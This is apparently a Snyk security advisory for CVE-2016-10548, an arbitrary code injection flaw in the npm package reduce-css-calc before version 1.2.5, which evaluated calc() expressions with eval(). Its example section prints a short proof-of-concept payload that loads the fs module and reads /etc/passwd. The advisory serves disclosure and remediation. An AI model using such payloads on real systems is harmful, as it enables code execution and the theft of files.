Arbitrary Code Injection in reduce-css-calc

Do your applications use this vulnerable package? Test your applications

Overview

reduce-css-calc is a package that reduces CSS calc() function to the maximum. Affected versions of the package used eval() for evaluation the expression, allowing the attacker to gain arbitrary code execution via specially crafted input.

Example

The issue was reported by ChALkeR and demonstrated by his example below:

const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc(                       (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc(                       (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc(                       (fs['readFileSync']("/etc/passwd", "utf-8")))`));

Remediation

Upgrade reduce-css-calc version 1.2.5 or greater.

References

Attack Vector

Network
Attack Complexity

Low
Privileges Required

None
User Interaction

Required
Scope

Changed
Confidentiality

Low
Integrity

Low
Availability

None

Credit: Сковорода Никита Андреевич (ChALkeR)
CVE: CVE-2016-10548
CWE: CWE-94
Snyk ID: npm:reduce-css-calc:20160913
Disclosed: 20 Aug, 2016
Published: 17 Oct, 2016

Arbitrary Code Injection
Affecting reduce-css-calc package, versions <1.2.5

Overview

Example

Remediation

References

CVSS Score

Arbitrary Code Injection Affecting reduce-css-calc package, versions <1.2.5

Overview

Example

Remediation

References

Arbitrary Code Injection
Affecting reduce-css-calc package, versions <1.2.5